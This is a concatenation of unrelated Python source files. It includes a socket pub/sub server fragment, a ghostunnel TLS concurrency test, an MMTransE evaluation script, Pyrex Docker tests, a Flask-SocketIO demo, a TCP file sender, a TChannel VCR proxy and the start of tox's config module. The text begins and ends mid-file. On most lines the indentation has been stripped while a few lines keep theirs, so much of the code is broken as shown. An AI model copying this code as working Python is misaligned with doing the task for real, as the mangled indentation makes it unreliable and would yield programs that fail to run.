except ConnectionResetError: pass
except ConnectionAbortedError: pass
finally:
connection.close()
self.log(f"id {id} disconnected : {address[0]}")
del self.connections[id]
del self.subscriptions[id]
for i in self.subscriptionAlert: i(self.subscriptions)
def sendInfos(self, id): self.send(id, f"version:{self.version}: spacer:{self.spacer}: id:{id}:")
def process(self, data: str, id: int):
command = data.strip().split(" ")[0]
args = data.strip().split(" ")[1:]
commands = {
"subscribe": self.subscribe,
"emit": self.emit,
"save": self.save,
"get": self.get
}
        if command in commands:
            if not commands[command](id, args):
                self.connections[id].send("error".encode())
        else:
            self.connections[id].send("unknown".encode())
def save(self, id, args):
if not self.mongo: return False
if len(args) != 2: return False
keyword, value = args
if keyword.find(self.spacer) != -1: return False
value = value.replace(self.spacer, " ")
result = self.db.storage.find_one({"name": "keywordStorage"})
if not result:
self.db.storage.insert_one({"name": "keywordStorage", "keywords": dict()})
result = self.db.storage.find_one({"name": "keywordStorage"})
if value == "$delete":
try: del result["keywords"][keyword]
except: return False
else: result["keywords"][keyword] = value
self.db.storage.update_one({"_id":result["_id"]}, {"$set": {"keywords": result["keywords"]}})
return True
def get(self, id, args):
if not self.mongo: return False
if len(args) != 1: return False
keyword = args[0]
if keyword.find(self.spacer) != -1: return False
result = self.db.storage.find_one({"name": "keywordStorage"})
if not result:
self.db.storage.insert_one({"name": "keywordStorage", "keywords": dict()})
result = self.db.storage.find_one({"name": "keywordStorage"})
        value = None
        try:
            value = result["keywords"][keyword]
        except KeyError:
            pass
self.send(id, f"query {keyword} {value.replace(' ', self.spacer) if value else 'error'}")
return True
def emit(self, _, args):
if len(args) < 2: return
topic = args[0]
data = self.spacer.join(args[1:])
sent = False
for i in self.subscriptions:
if topic in self.subscriptions[i]:
self.send(i, f":{topic} {data}")
sent = True
return sent
def subscribe(self, id, args):
if len(args) != 1: return
subscriptions: list = self.subscriptions[id]
if args[0] in subscriptions:
self.log(f"id {id} unsubbed from '{args[0]}'")
subscriptions.remove(args[0])
self.send(id, "0")
else:
self.log(f"id {id} subbed to '{args[0]}'")
subscriptions.append(args[0])
self.send(id, "1")
self.subscriptions[id] = subscriptions
for i in self.subscriptionAlert: i(self.subscriptions)
return True
    def register(self, subscriptionName: str, func):
        self.subscriptionRegistered.setdefault(subscriptionName, []).append(func)
def log(self, data):
data = data.replace("\n", " ")
data = f"{datetime.now().strftime('%a %d.%m. (%H:%M:%S)')} : {data}\n"
if self._log:
with open(self._log, "a+") as fp:
fp.write(data)
else: print(data[:-1])
def close(self):
self.stop = True
self.sock.close()
self.log("server closed")
def events(self, event, func):
if event == "subscription": self.subscriptionAlert.append(func)
def send(self, id: int, data:str): self.connections[id].send(data.encode())
|
test-client-concurrent-connections.py
|
#!/usr/bin/env python3
# Creates a ghostunnel. Ensures that multiple servers can communicate.
from subprocess import Popen
from multiprocessing import Process
from test_common import *
import socket, ssl, time, random
def send_data(i, p):
counter = 0
while counter < 100:
r = random.random()
if r < 0.4:
time.sleep(r)
continue
        counter += 1
if r < 0.7:
p.validate_can_send_from_client("blah blah blah", "{0}:{1} client -> server".format(i, counter))
else:
p.validate_can_send_from_server("blah blah blah", "{0}:{1} server -> client".format(i, counter))
r = random.random()
if r < 0.5:
p.validate_closing_client_closes_server("{0} client close -> server close".format(i))
else:
p.validate_closing_server_closes_client("{0} server close -> client close".format(i))
if __name__ == "__main__":
ghostunnel = None
n_clients = 10
try:
# create certs
root = RootCert('root')
root.create_signed_cert('client')
for i in range(1, n_clients):
root.create_signed_cert("server{0}".format(i))
# start ghostunnel
ghostunnel = run_ghostunnel(['client', '--listen={0}:13001'.format(LOCALHOST),
'--target={0}:13002'.format(LOCALHOST), '--keystore=client.p12',
'--status={0}:{1}'.format(LOCALHOST, STATUS_PORT),
'--cacert=root.crt'])
# servers should be able to communicate all at the same time.
proc = []
for i in range(1, n_clients):
pair = SocketPair(TcpClient(13001), TlsServer("server{0}".format(i), 'root', 13002))
p = Process(target=send_data, args=(i,pair,))
p.start()
proc.append(p)
for p in proc:
p.join()
print_ok("OK")
finally:
terminate(ghostunnel)
|
test_MMTransE_lan_mapping_15k_fk.py
|
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../src/MMTransE'))
from MMTransE import MMTransE
import time
import multiprocessing
from multiprocessing import Process, Value, Lock, Manager, Array
import numpy as np
from numpy import linalg as LA
fmap = os.path.join(os.path.dirname(__file__), '../../data/WK3l-15k/en_fr/en2fr_fk.csv')
fmap2 = os.path.join(os.path.dirname(__file__), '../../data/WK3l-15k/en_fr/fr2en_fk.csv')
fmodel = os.path.join(os.path.dirname(__file__), '../../models/en_fr/model_MMtransE_person_15k.bin')
ofile1 = os.path.join(os.path.dirname(__file__), '../../results/P_test_en2fr_score_MM_15k.txt')
ofile4 = os.path.join(os.path.dirname(__file__), '../../results/P_test_fr2en_score_MM_15k.txt')
ef_map = {}
fe_map = {}
vocab_e = []
vocab_f = []
topK = 10
model = MMTransE()
model.load(fmodel)
def seem_hit(x, y):
for i in y:
if x.find(i) > -1 or i.find(x) > -1:
return True
return False
for line in open(fmap):
    line = line.rstrip('\n').split('@@@')
    if len(line) != 2:
        continue
    vocab_e.append(line[0])
    if ef_map.get(line[0]) is None:
        ef_map[line[0]] = [line[1]]
    else:
        ef_map[line[0]].append(line[1])
for line in open(fmap2):
    line = line.rstrip('\n').split('@@@')
    if len(line) != 2:
        continue
    vocab_f.append(line[0])
    if fe_map.get(line[1]) is None:
        fe_map[line[1]] = [line[0]]
    else:
        fe_map[line[1]].append(line[0])
print("Loaded en_fr fr_en mappings.")
#en:...
manager = Manager()
lock1 = Lock()
past_num = Value('i', 0, lock=True)
score = manager.list()  # store hit@k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
cpu_count = multiprocessing.cpu_count()
t0 = time.time()
def test(model, vocab, index, src_lan, tgt_lan, map, score, past_num):
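    # Worker loop shared by several processes: pull the next vocab index from
    # the shared counter, fetch the top-K cross-lingual candidates, and fold
    # the per-word hit@k vector and rank into the shared score/rank state.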
while index.value < len(vocab):
id = index.value
index.value += 1
word = vocab[id]
        if id % 100 == 0:
            print(id, '/', len(vocab), ' time used ', time.time() - t0)
            print(score)
            print(rank.value)
tgt = map.get(word)
cand = model.kNN_entity_name(word, src_lan, tgt_lan, topK)
cand = [x[0] for x in cand]
tmp_score = np.zeros(topK)
hit = False
last_i = 0
cur_rank = None
        if tgt is None:
            continue
        for i in range(len(cand)):
            last_i = i
            tmp_cand = cand[i]
            if not hit and seem_hit(tmp_cand, tgt):
                hit = True
            if hit:
                tmp_score[i] = 1.0
                if cur_rank is None:
                    cur_rank = i
while last_i < topK:
if hit:
tmp_score[last_i] = 1.0
last_i += 1
if len(score) == 0:
score.append(tmp_score)
else:
with lock1:
score[0] = (score[0] * past_num.value + tmp_score) / (past_num.value + 1.0)
past_num.value += 1
        if cur_rank is not None:
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
continue
tmp_dist = 2
vec_t = None
vec_s = model.entity_transfer_vec(word, src_lan, tgt_lan)
for tmp_vec in tgt:
tmp_vec_t = model.entity_vec(tmp_vec, tgt_lan)
if tmp_vec_t is None:
continue
cur_dist = LA.norm(tmp_vec_t - vec_s)
if cur_dist < tmp_dist:
tmp_dist = cur_dist
vec_t = tmp_vec_t
if vec_t is None:
continue
cur_rank = model.entity_rank(vec_s, vec_t, tgt_lan)
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_e, index, 'en', 'fr', ef_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile1, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print('Finished testing en to fr')
#fr:...
manager = Manager()
past_num = Value('i', 0, lock=True)
score = manager.list()  # store hit@k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_f, index, 'fr', 'en', fe_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile4, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print('Finished testing fr to en')
|
test.py
|
#! /usr/bin/env python3
#
# Copyright 2019 Garmin Ltd. or its subsidiaries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import configparser
import grp
import os
import pwd
import re
import shutil
import stat
import subprocess
import sys
import tempfile
import threading
import unittest
PYREX_ROOT = os.path.join(os.path.dirname(__file__), '..')
sys.path.append(PYREX_ROOT)
import pyrex
TEST_IMAGE_ENV_VAR = 'TEST_IMAGE'
class PyrexTest(unittest.TestCase):
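    # Shared fixture: creates a scratch build/ tree with a pyrex.ini, prepends
    # a bin dir whose "python" symlink points at python2 (required by OE), and
    # gives each test thread its own working directory.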
def setUp(self):
self.build_dir = os.path.abspath(os.path.join(PYREX_ROOT, 'build'))
def cleanup_build():
if os.path.isdir(self.build_dir):
shutil.rmtree(self.build_dir)
cleanup_build()
os.makedirs(self.build_dir)
self.addCleanup(cleanup_build)
conf_dir = os.path.join(self.build_dir, 'conf')
os.makedirs(conf_dir)
self.pyrex_conf = os.path.join(conf_dir, 'pyrex.ini')
def cleanup_env():
os.environ = self.old_environ
# OE requires that "python" be python2, not python3
self.bin_dir = os.path.join(self.build_dir, 'bin')
self.old_environ = os.environ.copy()
os.makedirs(self.bin_dir)
os.symlink('/usr/bin/python2', os.path.join(self.bin_dir, 'python'))
os.environ['PATH'] = self.bin_dir + ':' + os.environ['PATH']
os.environ['PYREX_DOCKER_BUILD_QUIET'] = '0'
self.addCleanup(cleanup_env)
self.thread_dir = os.path.join(self.build_dir, "%d.%d" % (os.getpid(), threading.get_ident()))
os.makedirs(self.thread_dir)
self.test_image = os.environ.get(TEST_IMAGE_ENV_VAR)
if self.test_image:
conf = self.get_config()
conf['config']['dockerimage'] = self.test_image
conf.write_conf()
def get_config(self, defaults=False):
class Config(configparser.RawConfigParser):
def write_conf(self):
write_config_helper(self)
def write_config_helper(conf):
with open(self.pyrex_conf, 'w') as f:
conf.write(f)
config = Config()
if os.path.exists(self.pyrex_conf) and not defaults:
config.read(self.pyrex_conf)
else:
config.read_string(pyrex.read_default_config(True))
return config
def assertSubprocess(self, *args, capture=False, returncode=0, **kwargs):
if capture:
try:
output = subprocess.check_output(*args, stderr=subprocess.STDOUT, **kwargs)
except subprocess.CalledProcessError as e:
ret = e.returncode
output = e.output
else:
ret = 0
self.assertEqual(ret, returncode, msg='%s: %s' % (' '.join(*args), output.decode('utf-8')))
return output
else:
with subprocess.Popen(*args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs) as proc:
while True:
out = proc.stdout.readline().decode('utf-8')
if not out and proc.poll() is not None:
break
if out:
sys.stdout.write(out)
ret = proc.poll()
                self.assertEqual(ret, returncode, msg='{} failed'.format(args))
return None
def assertPyrexHostCommand(self, *args, quiet_init=False, **kwargs):
cmd_file = os.path.join(self.thread_dir, 'command')
commands = []
commands.append('. ./poky/pyrex-init-build-env%s' % ('', ' > /dev/null')[quiet_init])
commands.extend(list(args))
with open(cmd_file, 'w') as f:
f.write(' && '.join(commands))
return self.assertSubprocess(['/bin/bash', cmd_file], cwd=PYREX_ROOT, **kwargs)
def assertPyrexContainerShellCommand(self, *args, **kwargs):
cmd_file = os.path.join(self.thread_dir, 'container_command')
with open(cmd_file, 'w') as f:
f.write(' && '.join(args))
return self.assertPyrexHostCommand('pyrex-shell %s' % cmd_file, **kwargs)
def assertPyrexContainerCommand(self, cmd, **kwargs):
return self.assertPyrexHostCommand('pyrex-run %s' % cmd, **kwargs)
class PyrexCore(PyrexTest):
def test_init(self):
self.assertPyrexHostCommand('true')
def test_bitbake_parse(self):
self.assertPyrexHostCommand('bitbake -p')
def test_pyrex_shell(self):
self.assertPyrexContainerShellCommand('exit 3', returncode=3)
def test_pyrex_run(self):
self.assertPyrexContainerCommand('/bin/false', returncode=1)
def test_disable_pyrex(self):
# Capture our cgroups
with open('/proc/self/cgroup', 'r') as f:
cgroup = f.read()
pyrex_cgroup_file = os.path.join(self.thread_dir, 'pyrex_cgroup')
# Capture cgroups when pyrex is enabled
self.assertPyrexContainerShellCommand('cat /proc/self/cgroup > %s' % pyrex_cgroup_file)
with open(pyrex_cgroup_file, 'r') as f:
pyrex_cgroup = f.read()
self.assertNotEqual(cgroup, pyrex_cgroup)
env = os.environ.copy()
env['PYREX_DOCKER'] = '0'
self.assertPyrexContainerShellCommand('cat /proc/self/cgroup > %s' % pyrex_cgroup_file, env=env)
with open(pyrex_cgroup_file, 'r') as f:
pyrex_cgroup = f.read()
self.assertEqual(cgroup, pyrex_cgroup)
def test_quiet_build(self):
env = os.environ.copy()
env['PYREX_DOCKER_BUILD_QUIET'] = '1'
self.assertPyrexHostCommand('true', env=env)
def test_no_docker_build(self):
# Prevent docker from working
os.symlink('/bin/false', os.path.join(self.bin_dir, 'docker'))
# Docker will fail if invoked here
env = os.environ.copy()
env['PYREX_DOCKER'] = '0'
self.assertPyrexHostCommand('true', env=env)
# Verify that pyrex won't allow you to try and use docker later
output = self.assertPyrexHostCommand('PYREX_DOCKER=1 bitbake', returncode=1, capture=True, env=env).decode('utf-8')
self.assertIn('Docker was not enabled when the environment was setup', output)
def test_bad_docker(self):
# Prevent docker from working
os.symlink('/bin/false', os.path.join(self.bin_dir, 'docker'))
# Verify that attempting to run build pyrex without docker shows the
# installation instructions
output = self.assertPyrexHostCommand('true', returncode=1, capture=True).decode('utf-8')
self.assertIn('Unable to run', output)
def test_ownership(self):
# Test that files created in docker are the same UID/GID as the user
# running outside
test_file = os.path.join(self.thread_dir, 'ownertest')
if os.path.exists(test_file):
os.unlink(test_file)
self.assertPyrexContainerShellCommand('echo "$(id -un):$(id -gn)" > %s' % test_file)
s = os.stat(test_file)
self.assertEqual(s.st_uid, os.getuid())
self.assertEqual(s.st_gid, os.getgid())
with open(test_file, 'r') as f:
(username, groupname) = f.read().rstrip().split(':')
self.assertEqual(username, pwd.getpwuid(os.getuid()).pw_name)
self.assertEqual(groupname, grp.getgrgid(os.getgid()).gr_name)
def test_owner_env(self):
# This test is primarily designed to ensure that everything is passed
# correctly through 'pyrex run'
conf = self.get_config()
# Note: These config variables are intended for testing use only
conf['run']['uid'] = '1337'
conf['run']['gid'] = '7331'
conf['run']['username'] = 'theuser'
conf['run']['groupname'] = 'thegroup'
conf['run']['initcommand'] = ''
conf.write_conf()
# Make a fifo that the container can write into. We can't just write a
        # file because it won't be owned by the running user and thus can't be
# cleaned up
old_umask = os.umask(0)
self.addCleanup(os.umask, old_umask)
fifo = os.path.join(self.thread_dir, 'fifo')
os.mkfifo(fifo)
self.addCleanup(os.remove, fifo)
os.umask(old_umask)
output = []
def read_fifo():
nonlocal output
with open(fifo, 'r') as f:
output = f.readline().rstrip().split(':')
thread = threading.Thread(target=read_fifo)
thread.start()
try:
self.assertPyrexContainerShellCommand('echo "$(id -u):$(id -g):$(id -un):$(id -gn):$USER:$GROUP" > %s' % fifo)
finally:
thread.join()
self.assertEqual(output[0], '1337')
self.assertEqual(output[1], '7331')
self.assertEqual(output[2], 'theuser')
self.assertEqual(output[3], 'thegroup')
self.assertEqual(output[4], 'theuser')
self.assertEqual(output[5], 'thegroup')
def test_duplicate_binds(self):
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conf = self.get_config()
conf['run']['bind'] += ' %s %s' % (temp_dir, temp_dir)
conf.write_conf()
self.assertPyrexContainerShellCommand('true')
def test_bad_confversion(self):
# Verify that a bad config is an error
conf = self.get_config()
conf['config']['confversion'] = '0'
conf.write_conf()
self.assertPyrexHostCommand('true', returncode=1)
def test_conftemplate_ignored(self):
# Write out a template with a bad version in an alternate location. It
# should be ignored
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conftemplate = os.path.join(temp_dir, 'pyrex.ini.sample')
conf = self.get_config(defaults=True)
conf['config']['confversion'] = '0'
with open(conftemplate, 'w') as f:
conf.write(f)
self.assertPyrexHostCommand('true')
def test_conf_upgrade(self):
conf = self.get_config()
del conf['config']['confversion']
conf.write_conf()
# Write out a template in an alternate location. It will be respected
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conftemplate = os.path.join(temp_dir, 'pyrex.ini.sample')
conf = self.get_config(defaults=True)
if self.test_image:
conf['config']['pyreximage'] = self.test_image
with open(conftemplate, 'w') as f:
conf.write(f)
env = os.environ.copy()
env['PYREXCONFTEMPLATE'] = conftemplate
self.assertPyrexHostCommand('true', env=env)
def test_bad_conf_upgrade(self):
# Write out a template in an alternate location, but it also fails to
# have a confversion
conf = self.get_config()
del conf['config']['confversion']
conf.write_conf()
# Write out a template in an alternate location. It will be respected
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conftemplate = os.path.join(temp_dir, 'pyrex.ini.sample')
conf = self.get_config(defaults=True)
if self.test_image:
conf['config']['pyreximage'] = self.test_image
del conf['config']['confversion']
with open(conftemplate, 'w') as f:
conf.write(f)
env = os.environ.copy()
env['PYREXCONFTEMPLATE'] = conftemplate
self.assertPyrexHostCommand('true', returncode=1, env=env)
class TestImage(PyrexTest):
def test_tini(self):
self.assertPyrexContainerCommand('tini --version')
def test_icecc(self):
self.assertPyrexContainerCommand('icecc --version')
def test_guest_image(self):
# This test makes sure that the image being tested is the image we
# actually expect to be testing
if not self.test_image:
self.skipTest("%s not defined" % TEST_IMAGE_ENV_VAR)
dist_id_str = self.assertPyrexContainerCommand('lsb_release -i', quiet_init=True, capture=True).decode('utf-8').rstrip()
release_str = self.assertPyrexContainerCommand('lsb_release -r', quiet_init=True, capture=True).decode('utf-8').rstrip()
self.assertRegex(dist_id_str.lower(), r'^distributor id:\s+' + re.escape(self.test_image.split('-', 1)[0]))
self.assertRegex(release_str.lower(), r'^release:\s+' + re.escape(self.test_image.split('-', 1)[1]))
if __name__ == "__main__":
unittest.main()
|
ts_burst_example.py
|
#Copyright (c) 2017 Joseph D. Steinmeyer (jodalyst)
#Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#questions? email me at jodalyst@mit.edu
import time
import math
from threading import Thread, Lock
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit, join_room, leave_room,close_room, rooms, disconnect
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on available packages.
#async_mode = 'threading'
#async_mode = 'eventlet'
async_mode = None
if async_mode is None:
try:
import eventlet
async_mode = 'eventlet'
except ImportError:
pass
if async_mode is None:
try:
from gevent import monkey
async_mode = 'gevent'
except ImportError:
pass
if async_mode is None:
async_mode = 'threading'
print('async_mode is ' + async_mode)
# monkey patching is necessary because this application uses a background
# thread
if async_mode == 'eventlet':
import eventlet
eventlet.monkey_patch()
elif async_mode == 'gevent':
from gevent import monkey
monkey.patch_all()
#Start up Flask server:
app = Flask(__name__, template_folder='./', static_url_path='/static')
app.config['SECRET_KEY'] = 'secret!'  # shhh don't tell anyone. Is a secret
socketio = SocketIO(app, async_mode=async_mode)
thread = None
def dataThread():
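    # Background producer: samples two sine waves, emits them to clients in
    # bursts of burst_duration samples over socketio, and toggles the
    # amplitudes on/off every toggle_count samples to simulate a bursty signal.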
unique = 456
amp1 = 50
amp2 = 12
ampo1 = amp1
ampo2 = amp2
omega1 = 10
omega2 = 30
    set1 = []
    set2 = []
burst_duration = 1
counter = 0
on_state = True
toggle_count = 500
while True:
        set1.append(ampo1 * math.sin(omega1 * time.time()))
        set2.append(ampo2 * math.sin(omega2 * time.time()))
        counter += 1
        if counter % burst_duration == 0:
            socketio.emit('update_{}'.format(unique), [set1, set2], broadcast=True)
set1 = []
set2 = []
#print('sending')
if counter%toggle_count == 0:
counter = 0
if on_state:
ampo1 = 0
ampo2 = 0
print("OFF")
else:
ampo1 = amp1
ampo2 = amp2
print("ON")
on_state = not on_state
time.sleep(0.01)
@app.route('/')
def index():
global thread
print ("A user connected")
if thread is None:
thread = Thread(target=dataThread)
thread.daemon = True
thread.start()
return render_template('time_series_example.html')
if __name__ == '__main__':
socketio.run(app, port=3000, debug=True)
|
send_file.py
|
import socket
import json
import struct
import os
import hashlib
import multiprocessing
file_path = './send/Windows.iso'
file_name = os.path.basename(file_path)
def transmit(cnn, addr, file_info):
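    # Wire format: a struct-packed native unsigned-int length prefix
    # (typically 4 bytes), a short ack from the receiver, the JSON header
    # with file name/size/md5, then the raw file bytes in 16 KiB chunks.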
print(str(addr) + ' Connected')
try:
file_size = file_info['file_size']
header_bytes = json.dumps(file_info).encode()
transmit_size = 0
cnn.send(struct.pack('I', len(header_bytes)))
cnn.recv(1024)
cnn.send(header_bytes)
with open(file_path, 'rb') as f:
print(str(addr) + ' Sending ' + str(file_size) + ' bytes...')
while True:
send_data = f.read(16384)
if not send_data:
break
cnn.send(send_data)
transmit_size += len(send_data)
    except Exception as e:
        print(str(addr) + ' Disconnected: ' + repr(e))
finally:
print(str(addr) + ' Done. ' + str(transmit_size) + ' bytes transmitted.')
cnn.close()
if __name__ == "__main__":
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('', 23333))
s.listen(5)
print('Starting service for {} ...'.format(file_name))
file_size = os.path.getsize(file_path)
print('File size: {} bytes'.format(str(file_size)))
with open(file_path, 'rb') as f:
file_hash = hashlib.md5()
'''
while chunk := f.read(16384):
file_hash.update(chunk)
'''
while True:
chunk = f.read(16384)
if not chunk:
break
file_hash.update(chunk)
file_hash = file_hash.hexdigest()
print('File hash: {}'.format(file_hash))
header = {
'file_name': file_name,
'file_size': file_size,
'file_hash': file_hash
}
print('Service started')
while True:
try:
cnn, addr = s.accept()
m = multiprocessing.Process(target=transmit, args=(cnn, addr, header,))
m.daemon = True
m.start()
except Exception as e:
print(e)
|
server.py
|
# Copyright (c) 2016 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import
import six
import sys
import random
import threading
from functools import wraps
import traceback
from concurrent.futures import Future as ConcFuture
from tornado import gen
from tornado.ioloop import IOLoop
from tchannel.errors import TChannelError
from tchannel import TChannel
from . import proxy
def wrap_uncaught(func=None, reraise=None):
"""Catches uncaught exceptions and raises VCRServiceErrors instead.
:param reraise:
        Collection of exception classes that should be re-raised as-is.
"""
reraise = reraise or ()
def decorator(f):
@wraps(f)
@gen.coroutine
def new_f(*args, **kwargs):
try:
result = yield gen.maybe_future(f(*args, **kwargs))
except Exception as e:
if any(isinstance(e, cls) for cls in reraise):
raise e
raise proxy.VCRServiceError(str(e) +
' ' + traceback.format_exc())
else:
raise gen.Return(result)
return new_f
if func is not None:
return decorator(func)
else:
return decorator
class VCRProxyService(object):
def __init__(self, cassette, unpatch):
"""
:param unpatch:
A function returning a context manager which temporarily unpatches
any monkey patched code so that a real request can be made.
:param cassette:
Cassette being played.
"""
self.unpatch = unpatch
self.cassette = cassette
self.io_loop = None
self.thread = None
self.tchannel = None
self._running = ConcFuture()
@wrap_uncaught(reraise=(
proxy.CannotRecordInteractionsError,
proxy.NoPeersAvailableError,
proxy.RemoteServiceError,
proxy.VCRServiceError,
))
@gen.coroutine
def send(self, request):
cassette = self.cassette
request = request.body.request
# TODO decode requests and responses based on arg scheme into more
# readable formats.
# Because Thrift doesn't handle UTF-8 correctly right now
if isinstance(request.serviceName, bytes):
request.serviceName = request.serviceName.decode('utf-8')
if isinstance(request.endpoint, bytes):
request.endpoint = request.endpoint.decode('utf-8')
# TODO do we care about hostport being the same?
if cassette.can_replay(request):
vcr_response = cassette.replay(request)
raise gen.Return(vcr_response)
if cassette.write_protected:
raise proxy.CannotRecordInteractionsError(
'Could not find a matching response for request %s and the '
'record mode %s prevents new interactions from being '
'recorded. Your test may be performing an unexpected '
'request.' % (str(request), cassette.record_mode)
)
peers = []
if request.hostPort:
peers = [request.hostPort]
else:
peers = request.knownPeers
if not peers:
raise proxy.NoPeersAvailableError(
'Could not find a recorded response for request %s and was '
'unable to make a new request because both, hostPort and '
'knownPeers were unspecified. One of them must be specified '
'for me to make new requests. Make sure you specified a '
'hostport in the original request or are advertising '
'on Hyperbahn.' % (str(request),)
)
arg_scheme = proxy.ArgScheme.name_of(request.argScheme).lower()
with self.unpatch():
# TODO propagate other request and response parameters
# TODO might make sense to tag all VCR requests with a protocol
# header of some kind
response_future = self.tchannel._dep_tchannel.request(
service=request.serviceName,
arg_scheme=arg_scheme,
hostport=random.choice(peers),
).send(
request.endpoint,
request.headers,
request.body,
headers={h.key: h.value for h in request.transportHeaders},
)
# Don't actually yield while everything is unpatched.
try:
response = yield response_future
except TChannelError as e:
raise proxy.RemoteServiceError(
code=e.code,
message=str(e),
traceback=traceback.format_exc()
)
response_headers = yield response.get_header()
response_body = yield response.get_body()
vcr_response = proxy.Response(
code=response.status_code,
headers=response_headers,
body=response_body,
)
cassette.record(request, vcr_response)
raise gen.Return(vcr_response)
@property
def hostport(self):
return self.tchannel.hostport
def _run(self):
self.io_loop = IOLoop()
self.io_loop.make_current()
self.tchannel = TChannel('proxy-server')
# Hack around legacy TChannel
from tchannel.thrift import rw as thriftrw
thriftrw.register(
self.tchannel._dep_tchannel._handler,
proxy.VCRProxy,
handler=self.send,
)
try:
self.tchannel.listen()
self._running.set_result(None)
except Exception as e:
if six.PY2:
self._running.set_exception_info(*sys.exc_info()[1:])
if six.PY3:
self._running.set_exception(e)
else:
self.io_loop.start()
def start(self):
self.thread = threading.Thread(target=self._run)
self.thread.start()
self._running.result(1) # seconds
def stop(self):
self.tchannel._dep_tchannel.close()
self.tchannel = None
self.io_loop.stop()
self.io_loop = None
self.thread.join(1) # seconds
self.thread = None
def __enter__(self):
self.start()
return self
def __exit__(self, *args):
self.stop()
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
# DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
# Import hookimpl directly from tox instead.
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
SUICIDE_TIMEOUT = 0.0
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
_FACTOR_LINE_PATTERN = re.compile(r"^([\w{}\.!,-]+)\:\s+(.+)")
_ENVSTR_SPLIT_PATTERN = re.compile(r"((?:\{[^}]+\})+)|,")
_ENVSTR_EXPAND_PATTERN = re.compile(r"\{([^}]+)\}")
